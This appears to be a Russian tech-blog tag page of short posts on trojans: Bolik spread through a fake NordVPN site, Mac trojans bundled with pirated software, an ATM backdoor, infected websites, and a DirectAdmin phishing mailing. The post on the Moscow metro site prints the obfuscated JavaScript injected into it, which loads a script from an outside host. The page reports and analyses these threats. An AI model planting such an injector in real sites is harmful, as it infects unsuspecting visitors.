Pull to refresh
  • by relevance
  • by date
  • by rating

Банковский троянец Bolik распространяется под видом NordVPN

Antivirus protection

Специалисты вирусной лаборатории «Доктор Веб» обнаружили, что хакеры используют копии сайтов популярных сервисов для распространения опасного банковского троянца Win32.Bolik.2. Один из таких ресурсов копирует известный VPN-сервис, а другие замаскированы под сайты корпоративных офисных программ.


Недавно копию сайта популярного VPN-сервиса NordVPN наши специалисты обнаружили по адресу nord-vpn[.]club. Как и на оригинальном ресурсе, пользователю предлагается скачать программу для использования VPN, но вместе с ней авторы подделки распространяют опасного банковского троянца – Win32.Bolik.2.

Читать дальше →
Total votes 7: ↑6 and ↓1+5
Views2K
Comments 0

Sophos агитирует за Macintosh

Lumber room
Компания Sophos, работающая в области защиты бизнеса от компьютерных угроз, представила результаты исследования кибератак последних шести месяцев. Согласно этим результатам, новых червей и вирусов появилось не очень много, но зато пошли в рост вредоносные коды, созданные для кражи информации и денег.

Численность новых троянских программ на текущий момент соотносится с количеством других вирусов и червей как 4:1, тогда как в 1-й половине 2005 года соотношение определялось как 2:1.

Глядя на эту стремительную прогрессию, эксперты Sophos предположили, что в целях безопасности для пользователей домашних ПК целесообразно перейти на Apple Mac, сообщает «ДиалогНаука». «Что любопытно, хакеры, кажется, с удовольствием нацеливают свои атаки именно на Windows и не стремятся осваивать другие платформы, — говорит Грехэм Клули (Graham Cluley), главный технический консультант Sophos. – Похоже, Macintosh еще какое-то время будет оставаться более безопасными для пользователей – это следует учитывать тем, кто собирается приобрести новый компьютер».
Rating0
Views238
Comments 0

Каждая десятая страница заражена троянами

Information Security
Программисты Google проанализировали 4,5 млн веб-страниц, после чего выяснили, что приблизительно 450 тыс из них были способны загрузить «злобное» ПО (трояны и вирусы) без ведома пользователя.

Отвечающий за скачивание «злобного» ПО код чаще всего находится в неконтролируемых владельцами сайтов частях, например, в рекламных баннерах, счётчиках трафика, календарях, взятых у третьих сторон.

Очень часто злоумышленники пользуются человеческими слабостями, чтобы завлечь пользователя. Например, пишут в ссылках, что пройдя по ним можно скачать порнографию, или программное обеспечение.

В Google уже начали идентифицировать веб-страницы, содержащие вредоносное ПО, с целью создания карты опасных зон Сети. Правда, сейчас Google является участником StopBadware и уже предупреждает в поисковых результатах о потенциально опасных сайтах.
Total votes 5: ↑5 and ↓0+5
Views703
Comments 1

Полезный софт для защиты компьютера

Lumber room
alexf.name/2007/10/03/poleznyj-soft-dlya-zashhity-kompyutera
Вот список софта, который использую я у себя и который защищает от 99.99% вирусов и троянов:
1. Файрвол. Долгое время я использовал ZoneAlarm, но у него есть несколько минусов: во-первых, он не бесплатный, а хакнутые версии не обновляются. Во-вторых, там используется какая-то глючная база данных для хранения настроек, которая периодически портится и вместе с ней портятся все сохранённые настройки (за это я его и прибил). В-третьих, мне тут недавно попался на глаза отчёт о сравнении производительности, так вот компьютер с установленным ZoneAlarm’ом тормозит сильнее всех. Поэтому был найден и поставлен бесплатный аналог — Comodo. Пока первые впечатления хорошие.
2. Антивирус — я использую Avira AntiVir. Достоинства — бесплатный и при работе не грузит комп. Из недостатков стоит отметить немного глючный апдейт — иногда программа не может соединиться с собственным сервером.
3. Windows Defender. Это программа для очистки от троянов от дяди Билли. Использую скорей для подтверждения что другие программы чистят как положено.
4. Spybot — основная программа для очистки и защиты компьютера от троянов. Бесплатная, работает нормально, обязательно надо использовать функцию “иммунизации”.
5. SpywareBlaster — тоже бесплатная программа, которая в основном “иммунизирует” компьютер, добавляя заранее заготовленные списки сайтов в категорию restricted. Забавно, что туда добавляются некоторые спонсоры, которые раньше баловались спайварой, например CoolWebSearch.
6. CCleaner — программа для очистки от “мусора”, забытых логов, потерянных временных файлов и т.п.
7. AutoRuns — программа для ручного просмотра и редактирования всего что автоматически запускается при старте компьютера. Если какой-то неизвестный троян проскочит через защиту, то наверняка он обнаружится этой программой, запускаться то ему как-то надо.
Для того чтобы всё это работало, естественно нужно скачивать все доступные обновления для всех программ.
Total votes 12: ↑4 and ↓8-4
Views641
Comments 21

Вирусный маркетинг стал вирусным буквально

Information Security
Два дня назад на сайте alfastrah.ru появилось так называемое «пасхальное яйцо» — если кликнуть 5-6 раз на номер телефона в правом верхнем углу в шапке сайта начинал играть ролик эротического содержания. Подробно детали вирусной акции описаны здесь.

Не секрет, что вирусный маркетинг ориентирован на очень быстрое распространение — заходы на сайт росли по экспоненте. На некоторых форумах появились предупреждения о том, что при заходе на сайт Касперский ругается и говорит, что на сайте сидит троян. В разговоре с сотрудниками лаборатории Касперского эта информация подтвердилась. Таким образом, «вирусный маркетинг» обернулся буквально вирусным. Привожу некоторые экспертные комментарии.
Читать дальше →
Total votes 78: ↑73 and ↓5+68
Views1.3K
Comments 54

Свежий троян для MacOS

Information Security
Новый пакет программ iWork '09 для маков, представленный на MacWorld 2009, буквально в тот же день появился на торрентах. Естественно, это была пиратская версия, но самое интересное заключается в другом. Популярный пакет программ под MacOS шел с «довеском» в виде трояна OSX.Trojan.iServices.A. По оценкам экспертов из компании Intego, заражено около 20 000 компьютеров.

Троян прописывается в автозапуск и получает полные права, так что вполне может устанавливать дополнительный вредоносный код и модифицировать установленные приложения.

Хорошая новость заключается в том, что сам по себе троян не распространяется, установить его можно только с пиратской копией iWork '09. Так что будьте бдительны!

UPD: Нашлась новость, в которой товарищ утверждает, что заразился выкачав trial версию с торрент-трекеров вместо официального сайта. Там же приводятся некоторые подробности по симптомам.

UPD 2: Способы обнаружения и борьбы (спасибо ilmarinen)
1. Перед установкой iWork '09 проверьте нет ли там пакета iWorkServices.pkg (это собственно и есть довесок с трояном).

2. Если установили, но не уверены в наличии трояна:
1. (открыть Terminal.app)
2. sudo su (ввести пароль)
3. ls -la /System/Library/StartupItems/iWorkServices
Если говорит «No such file or directory». Трояна нет.

3. Если уже получили трояна:
1. (открыть Terminal.app)
2. sudo su (ввести пароль)
3. rm -r /System/Library/StartupItems/iWorkServices
4. rm /private/tmp/.iWorkServices
5. rm /usr/bin/iWorkServices
6. rm -r /Library/Receipts/iWorkServices.pkg
7. killall -9 iWorkServices
Total votes 20: ↑17 and ↓3+14
Views1.5K
Comments 56

Свежая модификация трояна OSX.Trojan.iServices

Information Security
Всего три дня назад я писал о том, что был обнаружен новый троян под Mac, а уже сегодня в сети появилась его модификация. На этот раз троян распространяется в торрентах с пакетом Photoshop CS4. Сам пакет чист, но вот распространяемая с ним программа для генерации серийных номеров — с подарком.

Что и как делают кряк и троян:
  • Для запуска кряк просит пароль рута, который используется для передачи соответствующих прав трояну.
  • При запуске кряка, троян распаковывается в /var/tmp/ со случайным именем файла. При повторном запуске генерируется второй аналогичный файл.
  • Троян копируется в /usr/bin/DivX и создает ключ автозапуска в /System/Library/StartupItems/DivX.
  • Троян проверяет наличие рутовых прав и сохраняет хеш пароля рута в /var/root/.DivX.
  • Троян прослушивает случайный ТСР порт и отвечает на внешние запросы пакетами по 209 байт. Также он периодически подключается к двум IP-адресам.
  • Кряк открывает образ диска, спрятанный в директории с его ресурсами, и собственно ломает защиту фотошопа.

Троян получил название OSX.Trojan.iServices.B, а обнаружен был все той же компанией Intego. По их данным, возможное число зараженных компьютеров — около 5 000.

В любом случае лучшая защита — не давать пароля рута неизвестным приложениям, либо программам не из официальных источников.
Total votes 23: ↑22 and ↓1+21
Views1.1K
Comments 43

Трояны в банкоматах. Официальные комментарии «Лаборатории Касперского»

Information Security
Новость про появление вирусов в банкоматах наделала сегодня немало шума. На Хабре уже успели проскочить ссылки на соответствующие публикации на сайтах Lenta.ru и CNews, однако каких-либо официальных комментариев со стороны компаний, занимающихся информационной безопасностью, у нас тут так и не появилось. И вот буквально только что я получил некоторые разъяснения из «Лаборатории Касперского». Комментирует Александр Гостев, руководитель центра глобальных исследований и анализа угроз «Лаборатории Касперского»:

«Данная вредоносная программа была обнаружена и добавлена в антивирусные базы „Лаборатории Касперского“ 19 марта 2009 года под именем Backdoor.Win32.Skimer.a. Это троянская программа, которая заражает банкоматы популярного американского производителя Diebold (по неподтвержденным данным, речь идет о банкоматах, расположенных на территории РФ и Украины). На сегодняшний день отсутствует информации о реально зараженных машинах. Однако мы предполагаем, что их количество, если таковые вообще существуют, минимально. Зараженные машины становятся уязвимыми для дальнейших действий злоумышленника, а именно: имея специальную карточку доступа, вирусописатель может снять всю наличность, имеющуюся в банкомате, а также получить доступ к информации о всех проведенных через этот банкомат транзакциях других пользователей.

Принцип заражения, учитывая отсутствие реальных обращений от банков, пока не до конца очевиден. Специалисты ЛК предполагают, что речь может идти о двух возможных вариантах: прямой физический доступ к системе банкомата или доступ через внутреннюю сеть банка, к которой подключены банкоматы.

Анализ кода программы позволяет с высокой долей вероятности предположить, что его автор — гражданин одной из стран СНГ.

К сожалению, рядовой пользователь не сможет самостоятельно определить заражение банкомата. Однако это могут сделать его владельцы. Чтобы избежать возможного заражения, эксперты ЛК настоятельно рекомендуют всем банкам провести проверку эксплуатируемых сетей банкоматов при помощи обычной антивирусной программы, детектирующий данное зловредное ПО.

Backdoor.Skimer.a — первая вредоносная программа, нацеленная на заражение и существование в банкоматах. Мы не исключаем появления новых вредоносных программ, направленных на нелегитимное использование банковской информации и наличных средств.»
Total votes 68: ↑65 and ↓3+62
Views1.4K
Comments 103

Open Source побеждает на рынке троянского ПО

Open source
По мнению некоторых специалистов по безопасности, на рынке троянов доля Open Source достигла 10% и продолжает расти. Открытый софт имеет преимущество перед закрытым, ибо здесь легче модифицировать программу и добавлять новые фичи, что очень важно в этом специфическом программном обеспечении.

Некоторые троянские программы с открытыми исходниками де-факто превращаются в коллективные проекты: одна хакерская группировка добавит туда модуль криптографии, другая — функционал видеотрансляций с удалённого ПК и т.д. Авторы троянов при этом зарабатывают привычным для Open Source способом — они получают широкую известность за счёт открытия исходников, и делают платную версию программы с расширенным функционалом.
Читать дальше →
Total votes 19: ↑12 and ↓7+5
Views3.3K
Comments 3

Зарази MacOS — получи деньги (ужасы нашего городка)

IT-companies
image
На проходящей в Женеве конференции по ИБ VB Conference 2009 вирусный аналитик Sophos Labs Дмитри Самойссейкко (Dmitry Samosseikko) рассказал присутствующим о новом явлении в индустрии вирусописателей. В поле зрения докладчика попала партнерская сеть российского происхождения «Partnerka», распространяющая спам и вредоносное ПО для Mac. В частности, речь идет о троянах, встроенных в псевдокодеки.
Читать дальше →
Total votes 37: ↑27 and ↓10+17
Views393
Comments 67

Вирус на сайте ESET NOD32 Russia

Antivirus protection
Вчера, 19.11.2009, зайдя на главную страницу сайта ESET NOD32 Russia (ахтунг! не уверен — не ходи!), был неприятно удивлен: неожиданно открылся какой-то левый pdf-файл, после чего Comodo Firewall сообщил, что браузер Opera пытается запустить файл wJQs.exe

UPD: Перенес в блог вирусы (и антивирусы)
UPD2: вроде как пофиксили
Читать дальше →
Total votes 80: ↑74 and ↓6+68
Views3.2K
Comments 73

Официальный сайт Московского метрополитена затроянили

Antivirus protection
Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку JavaScript кода:


Смотрим последнюю строку злополучного файла:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);

После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:

Читать дальше →
Total votes 63: ↑56 and ↓7+49
Views2.4K
Comments 76

Кому ты веришь?

Antivirus protection
О, Хабралюди!

Событие сегодняшнее должно войти в учебники, ибо достойно того. В очередной раз уважаемая компания рассказала историю про суслика, которого никто не видит, а он меж тем есть)) Итак, прям с утра пришло вот такое сообщение:
Компания «Доктор Веб» – российский разработчик средств информационной безопасности – предупреждает о том, что эпидемия троянцев семейства Trojan.Winlock набирает обороты. В январе 2010 года количество россиян, пострадавших от вредоносных программ, требующих за разблокировку Windows отправить платное SMS-сообщение, составило несколько миллионов. Предположительные потери составляют сотни миллионов рублей.

Дальше в том же духе. Смотрим на оф. сайте Или в новостях, например, тут

Ну что сказать, я, как честный человек, побежал опрашивать сообщество — что они думают по поводу этого медиавброса. И вот удивительно — никакой паники, все тихо и спокойно. Комментарии из разряда — да, мы знаем о такой угрозе, количество назвать не можем. Пример из ЛК. При том не для публикации отдельные специалисты прямо говорят — стремление по-легкому попиариться.

Вот и вопрошаю я, друзи мои, доколе? Доколе такое будет происходить?
И знаете, невольно после таких «сообщений» сомневаешься в том, что вирусные лаборатории АВ-разработчиков вообще чем-то занимаются. Действительно, зачем, если можно угрозу годовой давности выдать за опаснейший вирус?

В этой связи вопрос — а вы лично сталкивались с этим зловредом в январе месяце? Ведь если эпидемия столь масштабна, как говорит ДрВеб, ее нельзя было не заметить.
Total votes 34: ↑12 and ↓22-10
Views513
Comments 37

Рунетология (49): правовой статус и судьба торрентов

Lumber room
Генеральный директор компании «Интернет Контент» Андрей Клименко и управляющий партнер юридической компании «Сенешаль Нейман» Павел Шинкаренко — о юридическом статусе торрентов, о технологиях блокирования распространения нелегального контента, о последствиях закрытия Torrents.ru и судьбе других торрент-трекеров, о достоинствах протокола Bittorrent, а также о деятельности «Пиратской партии» и глубине правовых проблем с социальной сетью «Вконтакте».

Интервью:
  • Можно ли оценить экономический ущерб от пиратства?
  • Торренты: юридические и этические противоречия
  • Возможен ли альянс между правообладателями и поисковыми системами?
  • Система контроля за пользователями торрентов от компании «Интернет контент»: технология, алгоритмы работы, бизнес-модель
  • Судебная практика в области интернет-права
  • Преследование нелегального контента: бизнес нового поколения?
  • В чем недостатки donation-модели дистрибуции?
  • Будущее торрент-пиратства — прогнозы и предположения
Обсуждаемые новости:
  • «Вконтакте» выиграла у ВГТРК в суде
  • Провайдеры будут делиться IP-адресами пользователей с милицией?
  • Троян вымогает деньги у пользователей торрентов
Послушать предыдущие выпуски и подписаться на RSS подкаста
Страница «Рунетологии» на Facebook

Total votes 33: ↑26 and ↓7+19
Views863
Comments 13

Технологии репутации для борьбы с ростом количества угроз

Trend Micro corporate blog
Сегодня запустить своего «собственного» троянца может практически любой достаточно целеустремленный школьник, причем для этого ему не нужно обладать знаниями в программировании, не нужно быть экспертом по поиску уязвимостей, не требуется уметь проводить массовые заражения через спам-рассылки или взлом сайтов – все это можно компенсировать парой сотен сэкономленных на завтраках долларов. Образовался целый рынок подпольных услуг, на котором можно купить конструкторы для создания фишинг-сайтов и троянских программ, заказать заражение определенного количества обывателей, а результаты работы «собственного» троянца – логины и пароли, номера кредитных карт – продать следующим звеньям криминальной цепи. Наш гипотетический школьник нажимает кнопку в конструкторе, и вот стандартный вредоносный код модифицируется в новый, еще неизвестный антивирусам. Именно из-за упрощения процессов создания и распространения количество уникальных образцов вредоносного ПО постоянно растет, антивирусные компании пытаются компенсировать это постоянными обновлениями сигнатур, но фактически они всегда остаются позади угрозы, ведь сигнатурный метод по своей сути реактивный.



Есть ли выход из этой гонки?
Total votes 8: ↑5 and ↓3+2
Views1.7K
Comments 8

Детективная история в стиле Java/JS

Information Security
image
Внимание: во время написания поста, сайт остаётся зараженным. Да, он может заразить Ваш Windows через дырку в Java (Возможно).

Вчера вечером, заглянув на сайт компании Связной, обнаружил там предупреждение Google об опасности заражения, естественно я отверг это и полез смотреть в исходники (Не делайте так!)
На первый взгляд там ничего опасного не оказалось. Пришлось копнуть глубже и я нашёл кое-что интересное!
Читать дальше →
Total votes 103: ↑88 and ↓15+73
Views2.1K
Comments 66

Droidcast. Интервью с разработчиками компании «Доктор Веб»

Development for Android
Android OS буквально с каждым днем становится все популярнее и распространеннее. Не удивительно, что все больше находится злоумышленников, которые пытаются как-то нажиться, воспользовавшись уязвимостями платформы.

Мы все чаще видим информационные сообщения о вирусах и непонятных приложениях под Android, бдительнее следим за разрешениями, которые приложения просят при установке, наблюдаем действия Google по удаленному удаления вредных программ со смартфонов пользователей.

Но так ли все плохо и страшно на самом деле? И какова ситуация на сегодняшний момент? За разъяснениями по этим вопросам редакция droidnews.ru обратилась к специалистам — компании «Доктор Веб». В итоге получилось довольно интересное интервью с разработчиками, слегка приправленное юмором, которое и предлагаем вам к прослушиванию.

Коротко о содержании беседы:
Читать дальше →
Total votes 5: ↑4 and ↓1+3
Views357
Comments 1

Как еще может помогать защита кода приложения?

StarForce Technologies corporate blog
Тут пару мыслей пришло. В основном лексика касается компьютерных игр, но и для делового софта может подойти:

1. Защита от reverse engeeniring (ну тут понятно)
2. Защита кода, проверяющего DLC (downloadable content — всякие скачиваемые дополнения)
3. Предупреждение пользователю, если exe повреждена вирусом
4. Предупреждение пользователю, если к exe цепляются трояны
5. Защита от незаконных модификаций exe с чей-либо третьей стороны (например, для читерских ачивок и ладдеров)

Имеется ввиду чисто защита кода, без привязок и проверок ПО на лицензионность.
Total votes 17: ↑1 and ↓16-15
Views1K
Comments 22

Взломан сайт DirectAdmin и клиентская база данных

Information Security
image

Вчера тысячи клиентов DirectAdmin получили письмо следующего содержания [вольный перевод]:

От кого: DirectAdmin <da-mailer@directadmin.com>
Тема: DirectAdmin Client Message

Дорогой %username%,

Обратите внимание, что в текущей версии DirectAdmin существует уязвимость.
Для того, чтобы узнать, как защитить ваш сервер, пока мы не решили вопрос с патчем,
пожалуйста, посетите hxxp://www.austinfosec.com.au/update.php [ссылка фишинговая, там троян]

С уважением,
DirectAdmin.com


Злоумышленники, как минимум, получили доступ к ФИО, почтовым ящикам и к номерам лицензий.
Есть риск, что они получили доступ также и к самим панелям клиентов.
Администрация DirectAdmin признаёт факт, что рассылка была произведена с их сервера, но утверждает, что панели клиентов в полной безопасности.

Обсуждение на официальном форуме DirectAdmin.
Total votes 33: ↑28 and ↓5+23
Views1.6K
Comments 22